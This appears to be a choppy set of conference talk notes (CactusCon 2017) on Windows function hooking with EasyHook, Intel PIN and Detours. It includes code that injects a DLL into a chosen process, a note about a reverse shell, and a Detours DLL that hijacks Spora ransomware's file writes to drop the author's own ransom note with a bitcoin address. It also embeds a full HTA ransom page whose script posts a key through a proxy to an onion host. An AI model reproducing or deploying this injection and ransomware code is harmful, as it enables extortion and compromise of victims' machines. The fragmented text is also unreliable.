It becomes useless. It has no purpose.
It's not like we can put the debugger on the target's machine and run along side to intercept functionality. That would be just plain silly.
Interception of program events at run time. For windows this can mean Window Messages (can of worms look it up), library calls, and function pointers. They achieve this through the use of inserting a jump instruction to a new location in memory that's executable. A 'trampoline' if you will that jumps back when done. Simple right?
We're going to create an 'add-user' executable and change its behavior...
#include <easyhook.h>
using namespace std;
BOOL WINAPI BorrowWinExec()
{
std::cout << "Replacing WinExec call!\r\n";
return WinExec("mspaint",3); // max window
}
extern "C" void __declspec(dllexport) __stdcall
NativeInjectionEntryPoint(REMOTE_ENTRY_INFO* inRemoteInfo);
void __stdcall NativeInjectionEntryPoint(REMOTE_ENTRY_INFO* inRemoteInfo)
{
HOOK_TRACE_INFO hHook = { NULL }; // keep track of our hook
NTSTATUS result = LhInstallHook(GetProcAddress(GetModuleHandle(TEXT("kernel32")),
"WinExec"),BorrowWinExec,NULL,&hHook);
ULONG ACLEntries[1] = { 0 };
LhSetExclusiveACL(ACLEntries, 1, &hHook);
return;
}
DWORD processId;
std::cout << "Enter a process ID: \r\n";
std::cin >> processId;
WCHAR *wingmsg = L"This is filler data, don't care about sending it!";
WCHAR* dllToInject = L"justfuckingworkalready.dll";
std::wcout << "Attempting to inject: " << dllToInject << " \r\n";
NTSTATUS nt = RhInjectLibrary(
processId, // The process to inject into
0, // ThreadId to wake up upon injection
EASYHOOK_INJECT_DEFAULT,
dllToInject, // 32-bit
NULL, // 64-bit not provided
&wingmsg, // data to send to injected DLL entry point
64 // size of data to send (first 64 in this case)
);
Local reverse shell that will connect to host 10.10.10.10 on port 802. Output to exe file.
extern "C" int (WINAPI * Real_connect)(SOCKET, const struct sockaddr*, int) = connect;
int WINAPI Detour_connect(SOCKET s, const struct sockaddr* name, int namelen)
{
struct sockaddr_in clientService;
memset(&clientService, 0, sizeof(clientService));
clientService.sin_family = AF_INET;
clientService.sin_addr.s_addr = inet_addr("127.0.0.1");
clientService.sin_port = htons(27015);
memset(clientService.sin_zero, 0, sizeof(clientService.sin_zero));
return Real_connect(s, (struct sockaddr*)&clientService, namelen); // detoured now!
}
A utility produced by intel that's cross platform and allows you to modify (or instruct) programs dynamically. Add functionality, debug, trace, or just plain mess with programs.
The same concept as Intel's PIN
Just free and open source. And with shittier documentation and samples. Also cross platform.
For simplicity's sake I will be making use of PIN.
#include <windows.h>
#include <stdio.h>
int main(void)
{
// omitted cactus for brevity
WIN32_FIND_DATA fd;
HANDLE hFind = FindFirstFile("kevin-spacey*", &fd);
if (hFind != INVALID_HANDLE_VALUE)
{
do
{
printf("Deleting file %s \r\n",fd.cFileName);
DeleteFile(fd.cFileName);
} while (FindNextFile(hFind, &fd));
FindClose(hFind);
}
printf("And gone!\r\n");
getchar();
return 9;
}
#include "pin.H"
#include <iostream>
namespace WINDOWS
{
#include<Windows.h>
}
using namespace std;
typedef void (* ORIG_FILE_DEL)(char *);
BOOL DontDeleteEverything(ORIG_FILE_DEL orig_pte, char *dafile)
{
cout << "I see a file to be deleted: " << dafile << endl;
WINDOWS::Sleep(1000);
if(strstr(dafile,"kevin-spacey") != NULL)
{
cout << "NOOOOOOO, LEAVE SPACEY ALONE! " << endl;
orig_pte("nowayjose");
return TRUE;
}
else{
cout << "Whatever man... " << endl;
orig_pte(dafile);
return FALSE;
}
}
VOID ImageLoad( IMG img, VOID *v )
{
RTN rtn = RTN_FindByName( img, "DeleteFileA" ); // A or W?
if (RTN_Valid(rtn))
{
cout << "Replacing DeleteFile in " << IMG_Name(img) << endl;
PROTO proto_delfile = PROTO_Allocate( PIN_PARG(BOOL), CALLINGSTD_DEFAULT,
"DeleteFileA", PIN_PARG(char *), PIN_PARG_END() );
RTN_ReplaceSignatureProbed(rtn, AFUNPTR(DontDeleteEverything), IARG_PROTOTYPE,
proto_delfile, IARG_ORIG_FUNCPTR,
IARG_FUNCARG_ENTRYPOINT_VALUE, 0, IARG_END);
PROTO_Free( proto_delfile );
}
}
INT32 Usage()
{
cerr << "This tool ensures that file deletion never deletes everything." << endl;
cerr << endl << KNOB_BASE::StringKnobSummary() << endl;
return -1;
}
int main( INT32 argc, CHAR *argv[] )
{
PIN_InitSymbols();
if (PIN_Init(argc, argv)) return Usage();
IMG_AddInstrumentFunction( ImageLoad, 0 );
PIN_StartProgramProbed();
return 0;
}
What's not to like about PIN? It makes everything HUGE. 4 MB for a DLL file plus another 16 MB for the launcher. EasyHook only clocks in at 427kb (launcher + dll). Detours is tiny at a 136kb all included. Size matters.
Sometimes they don't even PACK or ENCRYPT the thing.
File is a downloader and not well liked it seems.
File downloads from http://191.252.2.93 and opens a zip file and then executes the stuff within.
There exist many free editors for the jar file of varying degrees of usefulness.
Since the 'jar file' is basically just an lzma archive with '.class' files inside, its trivial to remove classes.
The best one is DirtyJoe.
Hits close to home.
Honorable Mention is Class Editor.
Your computer has been blocked using the Spora virus. There was a connection problem! <br> <br> To recover, write to the mail: [email protected] Or, try to connect again after 1 hour by restarting the computer
This would make all encryption done only unlock-able with MY private key.
#include "stdafx.h"
#include <windows.h>
#include <detours.h>
#include <cstring>
#include <string>
#include <Shlwapi.h>
#pragma comment(lib, "shlwapi.lib")
#pragma comment(lib, "detours.lib")
extern "C" BOOL (WINAPI * Real_Write_File)(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED) = WriteFile;
BOOL WINAPI Detour_WriteFile(HANDLE passedhandle, LPCVOID lpBuffer,
DWORD numbytes2write, LPDWORD numbyteswritten, LPOVERLAPPED lpOverlapped)
{
TCHAR buf[MAX_PATH + 1];
DWORD sz = GetFinalPathNameByHandle(passedhandle, buf, MAX_PATH, 0);
buf[sz] = 0;
WCHAR *pathfilename = PathFindFileName(buf);
if (wcscmp(pathfilename, L"HOW TO DECRYPT FILES.txt") == 0)
{
char *screw =
"Attention! All your files are belong \r\n"
"to us! If you want these files back,\r\n"
"send 1 BTC to the address:\r\n"
"1LmQSUfu3KPCLhj26Y4RJVci3FNum51YSR\r\n"
"then send an email to\r\n"
"[email protected] with the subject:\r\n"
"CactusCon 2017\r\n"
"Then I'll send the decryption key.\r\n"
" \r\n"
" /|\\\r\n"
" |||||\r\n"
" |||||\r\n"
" /\\ |||||\r\n"
"|||| |||||\r\n"
"|||| ||||| /\\\r\n"
"|||| ||||| ||||\r\n"
" \\|`-'|||| ||||\r\n"
" \\__ |||| ||||\r\n"
" ||||`-'|||\r\n"
" |||| ___/\r\n"
" |||||\r\n"
" |||||\r\n"
"-----------------\r\n";
return Real_Write_File(passedhandle, screw, strlen(screw), numbyteswritten, lpOverlapped);
}
WCHAR *exten = PathFindExtension(buf);
if (wcscmp(exten,L".hta") == 0)
{
char *me = "<hta:application showInTaskbar=\"no\" innerBorder=\"no\" navigable=\"no\" scroll=\"no\" border=\"none\" caption=\"none\"><html><body><script language='JScript'>t = new ActiveXObject('WScript.Shell').ExpandEnvironmentStrings('%temp%');f = new ActiveXObject('Scripting.FileSystemObject');c = new ActiveXObject('ADODB.Stream');if(!f.FileExists(t+'\\icon_2.png')){b = new ActiveXObject('MSXML2.DOMDocument').createElement('r');b.text='iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAMAAADXqc3KAAABp1BMVEVMaXHyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgD////yqwDyqQDxpQDxpgDyqADxpADwngDxogD//fn//vzyrAH3zGf63Zr64qf868L87MX87sr++e7++u///v3///7xoQDypwDyqwHyqwLyrADyrALyrAPyrQXyrQrzrgXzrgbzrwbzrwfzrwjzsRDzsBjzshP0tBn0tCH0tR70tiH0uCT0tyz0uCf0uCj1vDT1vjj1vT71vzz1v0n1wUL1wUb2wkX2w0r2x1X3yFj3yVz3y2f3zGX3zGb3zmv40G/40HT40XP40Xb40Xf40Xj40nj51YL514j52Iv52Y3525L63Zn635/636D64qb746r75rX757b87MT87Mb87cj8787978/979D979L98NP98df99eH++Ov++vL++/P+/PT//PX//Pb//Pf//vslsX0oAAAAKHRSTlMAAQMjJCUmKitcXV5fdXZ8fYGCnp+io6TDxMbH7O7v8PHy9fb7/P3+2lfZUwAAAZhJREFUKM9FktV2G0EQRFurxFYMUZzYSUwyaWduz4IoZgozMzMzMzN9dB52FPdj1zndp+qWiIgEOSms7i9ZM9jXVZBcIH4Cya8dwwJYxtYtk6C5bxvGGmNx1hjLSEemBNKJCS2QVqIIGxpWSiASSDuhgYj06P2dGxyYkA4JRFqGMMCmrdV7P/e9vx47DEMtItJNGVz8YO7xl6mTejreAmW6RVpHsODSc9M6v6CNm5tTh2WkVYoYAFc71tCJyR/68WDqMKyS9V6Ix3V2f+3UrD6NHYZeGcicufiZvkkrO77qy8RhGZAy2bhPWv88+UH/XEwcEHrBJUd+68Tz76oPKw6g7E9F2y7pr0O1XS+0fsaf6sVAtPf1W51JNlbPqt6qZM+LGFx8TRv67dGVy+9ULyQOQ9Eb3HP87t+5BdV5fQWZQVlDGVg8ryemZ+48Gd8e+UhkeQmDS25MHahfrSZxhA8xkDaMAdzu24cjH3t7BsSDiioRYENDZxOhR+sywMMrlqDne0abZRjtyctSTXJS6OobNKbU/78+/wBwgVrMmlG5mwAAAABJRU5ErkJggg==';b.dataType='bin.base64';c.type=1,c.open(),c.write(b.nodeTypedValue),c.saveToFile(t+'\\icon_2.png', 2),c.close();}if(!f.FileExists(t+'\\icon_3.png')){b = new ActiveXObject('MSXML2.DOMDocument').createElement('r');b.text='iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAMAAABg3Am1AAAChVBMVEVMaXFJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VHX4VJX4VJX4VJX4VJX4VJX4VJX4ZJX4VJX4VJX4VJX4VJX4VJX4VJX4VJXoVJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VHX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VHX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJYIVJX4ZJX4VJX4VKX4VJX4VJX4VJX4VJX4VJX4VHYIVJX4VJX4VJX4VJX4VJX4VJX4VJX4VHX4VJX4VJXoVJX4VHX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VKYIVHX4VJX4VJXoVJX4VJX4UVqfBJX4VHXoRLYYhBWH0XICwVe64Vpu0Vs/9MYodAWIEVqO8UqvJgcpHy9fYcrvQDK0psb3ZKYIUVtP9JX4RJXoRLYYlFXYNAV3wUIS5BWn0VsPwVeawVp+4+Vn8arPNKX4VKYIZKYIcVqvEXHysVXYEVgrQVo+kXHywVgrIWvv9MYoZAV4BfcpNKYYhGXYM/V4Dy9fVgcpLy9vcarfNidZVscXcHMk9cX2bg4eFkd5dgc5Jkd5aJlq7e39/o6ur19fIHM09TVl1UWF4FME1AWH1PZIo9VIAVqe8UqfIVeq4VHyvx8vGGkqVFXYAVpewVs/4cJTEwSW8Ue67y9PVrd4AcuP0DFCcDLEobq/ECIz0bgK5rc3kDLk1sb3cUp+9sbnUDK0kcrvVAV4FFXIMlOVIkOVK1vchEXIO1vMhvqanaAAAAbXRSTlMABPoCA/sB/fz+7LhgJAX555gJNg7B8/ICxJpy7pcBmSvjIsDLaSr4VGNYa2+/DOsD6eoL8Cff4XYm294KLOW+cCpXf/EDDvR9Ae0PZlZ6A2VVWS80MXgjdQMlIcJiLrkjdO/klJORAQRxCbZefx9iKwAAA3BJREFUSMeVlmV721AMhY9jx9dOU4YV165jZoaOmZmZQSluawdJGcfMzMzMzLzfs8eQzkmctHk/+To6jyTrRhJggOcaIirNnpjQPS48PK57QqI9LQoNOR7m8PEievYIsZEBW0iPnhDjTSUCj5kpEUQkSUxWjGUmSUQUERkKXvC15xAzqAHJViszemBWq0yDhw8F52UuCohuQkzysNY1EqMm0RBED/swtLKRJJMpskS2gQgTPeJpaiEL+cUiW5oao+LRWmaMAsCY3Bq1mQuYKMkyBUSWpVZuBYfokSRRHUjUaYoWlYhRCWSlOrFQbAyUxDtgrJ5vocMPhbpiuhIUj67JpCXgLM40pXirlgZ1mg8eHFL1gLYVlZZnmVBeWrRNT2MplgNdF5HyRQudRb/KdmSbsKPsZ9FWJSpGjUIBLNAcOIpLy3buqszxoXLXzrLSYodiY6UkoPM8XZBZvmfvvgpXnheuin1795Rn6oKQPpi7UEvZkZmVXVmxuyrXi6rdFZXZWZqAUXJfzNFrpghyXFXb13ixvcqV4xaQRHYkGgV5uWt8yM0zClIxm1j9BYwao5tetXoJZOqNYfpVqZeAqAGk4ARS8IK4YEMKOunGwX7WVEPh7j15fGe9F3ceP7lnKFwK7G7BoZv3n7s+59/N9+Bu/mfX8/s3D7kFq9E3WYvJcevR0/ev3n7bqHCipqam5oT6+O3tq/dPH93SL58tDX1CtOt9+Paz1+8+fn2zSeHG1dOnr95QH998/fju9bPbh7XrvWolkKQKHPsvPnz54cunzQqnzly7fv3amVPq4dOXDy8fXtzvUAUrAIQ2UmMq+XvlwYsNKkePX7509uyly8ePaucXD678Lqn9i3JIUVw4S/4cPF+gcazg5LkLF86dLDimvzh/8EeJU3GwGBx4hLZXareF1h1Y5+ZIdXV19ZHa44HvtEWpWsdZiAdmYKrayJxrA+BUG1mS2l1FxMQGavX/W2XbdmqrBIfJtvo0446T3O1bwJjwutt9+ATjgBjNWEAfEmPjMc44slo2DziyqHlLz0EahhYRZPU3FK0U0QJhHmN3hIBmsf7HbttmXmNXzaNdG5v5YG/fpjNMVgGhA9KX9PNdHfpFTsMQwWzZEAUR6f29l5P+6eoPfvYZYRmiBtgjM3p1keUuvTIi7QN81p9/3AT9SNQC/WYAAAAASUVORK5CYII=';b.dataType='bin.base64';c.type=1,c.open(),c.write(b.nodeTypedValue),c.saveToFile(t+'\\icon_3.png', 2),c.close();}if(!f.FileExists(t+'\\icon_4.png')){b = new ActiveXObject('MSXML2.DOMDocument').createElement('r');b.text='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';b.dataType='bin.base64';c.type=1,c.open(),c.write(b.nodeTypedValue),c.saveToFile(t+'\\icon_4.png', 2),c.close();}if(!f.FileExists(t+'\\icon_5.png')){b = new ActiveXObject('MSXML2.DOMDocument').createElement('r');b.text='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';b.dataType='bin.base64';c.type=1,c.open(),c.write(b.nodeTypedValue),c.saveToFile(t+'\\icon_5.png', 2),c.close();}</script><script>window.resizeTo(screen.availWidth*0.95,screen.availHeight*0.95);window.moveTo(screen.availWidth*0.025,screen.availHeight*0.025);r=\"<center><br><br><h1>You have been owned by AverageJoe</h1><br><br><h2> CactusCon 2017 baby!</h2><br><br><h3>oh and pay me BTC. Send them to 1LmQSUfu3KPCLhj26Y4RJVci3FNum51YSR and email [email protected] when done</h3><center>\";d=\"http://5pr6hirtlfan3j76.onion/\";try{h=new ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");h.setProxy(2,\"31.192.105.180:8123\",0);h.setTimeouts(10000,10000,60000,60000);h.open(\"POST\",d+\"?\"+Math.random(),0);h.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");h.send('key=CJVoUrir+SMkXSleyRFjHwiS7ybB+aKsEqQcziA4JLmaEEzSw5fauIcNcMUI28TCEQzlPVJYY+lBSj+YZFdaouPeiNC+wUqtHpTmMyCsaNiHGPDFNZ7KMxy2yo6QZ5kzFQIVLwYFJsBJ/S+KkZX1Ysb/cWzgS5tx6X0V1SYIOdPq9LhSrvGsls726titSXFidIgfC2OmBLrupIGKWGebpCQpJl4bJF+U4sBr6d/wEsSoWw/R+AvQb3B9cPuKGeNI4x+0JLhTPKlxUDzvIO96yjWfxNL63uXDZtgxhiHm/Exv0r4pAtYFqwG9IrqUXI5dUnqTWCX5eQTjWxKR/Nmff+jgmaCysEcgPhkG/Kwqat/UO6uRM7TFTNyEpPsohKKeCCIo/C1KdVvs57xglXcrUYlS8okxmaEyZm+XVJLFXVxNTXZJQd6nGZyF7NjDiyzd5eoiGbuhD9GMZ0sY1yLzy8rAItUCG1DcsuWWid/uJc/RQr0Wt9/jEnIcYp0KGFE7k9AYlYcxiG8WsQ9k+6xhxg2d3EV98j32H90V6r3CxS9Rsbep5+Rikj0cGOewScHxP1lGaLJqX8dwx5VcfewBPxx+ml5oyLqRx47trcwZG2os+QYcp1LZco8kDIXf8UrBqhcSO06rRUwBnF1SCjMyTU39XgHI2VqxCQhMK6Tv46amiH6zVEBRuH4/n5fiGkFGdoSrzROt0DzTy8+J5ZQgQy53WN+JK+Uxh/+HYowrb/qjANO716mpXeu8X8QdcEav5dIzo5ymmCWbGoyFDEdY0d8jkLXmcGWamlX1Eq4zKWrzVT2Kq79bLyjGFhgZXD+ynkdalkuelM9MC3SlfLjYqlqhMjmFA6sURtywB/0OXdohNCQdNIpPj4hvYvx4G8eZqmrdbiEzvCBNRvcRl5hpSoZ2+D0xRsPrxuABWUO8FmpVfph7GodJkLd9rP+PzW0EMYeLzoX6PjfGmRMPjJuOn3nzt2Uu3I0doXbhT4AJ+xT04aFwuBgd2xN7NOyIVHzmX85Fjjv0VNidRy4sKHmrhUQI66wYUX2kacEMF/FsTw0iHl0QshVVoMgpxV4/3hTMorq65VhD3JgmJwJdI94y3unMvrKumE86wHo9NHk6Uyn5e07IvjfianmAi4lTFct7FpygcM14eSE4o6dXx6PPQ9mRIF2AHcEP4mKH+1qzjgS9t9kTf1MY9zvog9i4C27RvaA/oFJggPRCaPzGqextSxI9XWuRGOqe0aEcgR6ZWRMNYty4NhqJPTRHKVA8Yi0i');document.write(h.responseText);}catch(e){document.write(r);}</script></body></html><div style='height:0;display:none'>";
return Real_Write_File(passedhandle, me, strlen(me), numbyteswritten, lpOverlapped);
}
return Real_Write_File(passedhandle, lpBuffer, numbytes2write, numbyteswritten, lpOverlapped);
}
extern "C" __declspec(dllexport) void DoNothingAlready(void)
{
DWORD ayylmao = 20345;
_asm
{
xor eax, eax
xor ecx, ecx
mov eax, ayylmao
mov ecx, 0
testd:
mov edx,234
xchg edx,ebx
xor ebx,ebx
inc ecx
cmp eax, ecx
jnz testd
pop ebx
nop
}
return;
}
BOOL WINAPI DllMain(HINSTANCE hinst, DWORD dwReason, LPVOID reserved)
{
if (DetourIsHelperProcess()) {
return TRUE;
}
if (dwReason == DLL_PROCESS_ATTACH) {
DetourRestoreAfterWith();
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)Real_Write_File, Detour_WriteFile);
DetourTransactionCommit();
}
else if (dwReason == DLL_PROCESS_DETACH) {
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourDetach(&(PVOID&)Real_Write_File, Detour_WriteFile);
DetourTransactionCommit();
}
return TRUE;
}